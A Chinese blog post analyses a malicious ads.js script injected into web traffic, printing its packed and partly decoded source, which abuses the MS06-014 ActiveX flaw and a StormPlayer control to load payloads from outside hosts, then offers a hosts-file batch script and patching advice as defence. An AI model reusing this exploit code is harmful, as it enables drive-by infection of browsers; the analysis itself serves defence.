这个地址是在telnet百度的时候发现的:
<script language=”javascript” SRC=”http://err.www404.cn:53/ads.js”></script>
把err.www404.cn:53/ads.js里的eval替换为document.write然后加个<script>的壳保存为html文件就可以初步解密出这个js的原型,然后分析代码可以知道是利用的ms06014这个漏洞(貌似还有暴风影音的痕迹)。只要你打上这个ms06041补丁就不会中这个ads.js的阴谋啦,还有最好把你的暴风影音也升级下。
ads.js源码:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(‘A B(){}f.L=B;b(4.t.G(\’s\’)==-1){z()}A z(){2 p=”Q:N”+”Y”+”-Z-V”;2 y=”0-R”+”-10″;2 v=p+y;2 9=”[x O]“;h{2 e;2 w=(4["P"+"U"](“x”));w["X"](“W”,v);f["E"]["D"](“C”+”F.”+”S”+”M”+”e”+”K”,”")}k(e){};j{2 a=i J();a.H(a.T()+1f);4.t=\’s=1s;1n=/;a=\’+a.1j();4.8(“<r 1l=1k:1h 6=7://d.c.5/1m.g></r>”);4.8(“<3 6=7://d.c.5/11.g></3>”);b(e!=9){}1r{h{2 1q=i f["l"](“1o.1p”);2 n}k(n){};j{b(n!=9){4.8(“<3 6=7://d.c.5/1i.g><\\/3>”)}}h{2 q=i f["l"](“1g”+”16.17″+”15.1″);2 m}k(m){};j{b(m!=9){4.8(“<3 6=7://d.c.5/q.g><\\/3>”)}}h{2 14=i f["l"](“12″+”13.I”+”18.1″);2 o}k(o){};j{b(o!=9){4.8(“<3 6=7://d.c.5/19.g><\\/3>”)}}}}}4.8(“<3 6=7://u.1e.5.1d.1c/1a/1b.u></3>”);’,62,91,’||var|script|document|cn|src|http|write|errinfo|hoodt|if|www404|err||window|gif|try|new|finally|catch|ActiveXObject|Gl|sto|IEINFO|Cikeid1|lz|iframe|MyCookie|cookie|js|Cikeid|afilesto|object|Cikeid2|exit|function|writeInfo|Ad|createobject|ado|odb|indexOf|setTime||Date|am|onload|tr|BD9|Error|creat|clsid|983A||getTime|eElement|11D|classid|setAttribute|6C556|65A3|00C04FC29E36|real10|IERP|Ctl|reals|atCtrl|AT|GLCh|ERPCtl|real11|621252|ystat|com|yahoo|tongji|86400000|GLCH|none|bf|toGMTString|display|style|614|path|MPS|StormPlayer|cikewm|else|lonely’.split(‘|’),0,{}))
ads.js解密后源码(我打过补丁啦,解密有问题,如果感兴趣可以自行去解密这个ads.js,然后分析他都从哪里下载啦什么):
function writeInfo(){}window.onload=writeInfo;if(document.cookie.indexOf(‘MyCookie’)==-1){exit()}function exit(){var Cikeid1=”clsid:BD9″+”6C556″+”-65A3-11D”;var Cikeid2=”0-983A”+”-00C04FC29E36″;var Cikeid=Cikeid1+Cikeid2;var errinfo=”[object Error]“;try{var e;var afilesto=(document["creat"+"eElement"](“object”));afilesto["setAttribute"](“classid”,Cikeid);window["ado"]["createobject"](“Ad”+”odb.”+”S”+”tr”+”e”+”am”,”")}catch(e){};finally{var hoodt=new Date();hoodt.setTime(hoodt.getTime()+86400000);document.cookie=’MyCookie=lonely;path=/;hoodt=’+hoodt.toGMTString();document.write(“”);document.write(” “);if(e!=errinfo){}else{try{var cikewm=new window["ActiveXObject"](“MPS.StormPlayer”);var sto}catch(sto){};finally{if(sto!=errinfo){document.write(” “);
这里的clsid为:clsid:BD96C556-65A3-11D0-983A-00C04FC29E36可以知道是利用的ms06014漏洞来挂的。
最下边还有stormPlayer是利用暴风影音漏洞来的。
临时解决办法(比如不让卡吧弹出提示什么的,因为怎么杀也杀不完,是别人机子中毒啦,DnsArp影响到你):
保存下面为a.bat然后双击运行就可以啦
echo 127.0.0.1 u.asdafdgfgf.com >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1 g.asdafdgfgf.com >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1 u.asdafdgfgf.com/ads.js >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1 222360.com >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1 k.222360.com >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1 k.222360.com/ads/ads.cab >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1 err.www404.cn >>C:\WINDOWS\system32\drivers\etc\hosts
echo 127.0.0.1 err.www404.cn:53/ads.js >>C:\WINDOWS\system32\drivers\etc\hosts
或者直接把这个222.216.28.25在路由器中过滤掉(ps:如果他是个人的adsl就过滤掉他一个网段吧),为啦不影响使用我过滤的他单个ip,还有开启360恶意网页拦截也能达到保护的效果。
转载原创文章请注明,转载自:[Lin's Space|Only]
本文链接: http://clin003.com/ideas/err-www404-cn-53-adsjs-1101/
Google比较注重原创性和时效性,若没有找到需要的内容可尝试以下搜素。